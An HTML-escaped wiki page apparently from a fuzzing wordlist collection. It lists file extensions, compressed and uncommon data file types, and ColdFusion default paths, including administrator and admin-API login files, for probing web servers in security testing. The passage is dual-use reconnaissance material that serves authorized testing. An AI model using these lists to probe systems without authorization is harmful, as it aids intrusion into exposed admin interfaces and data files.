.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
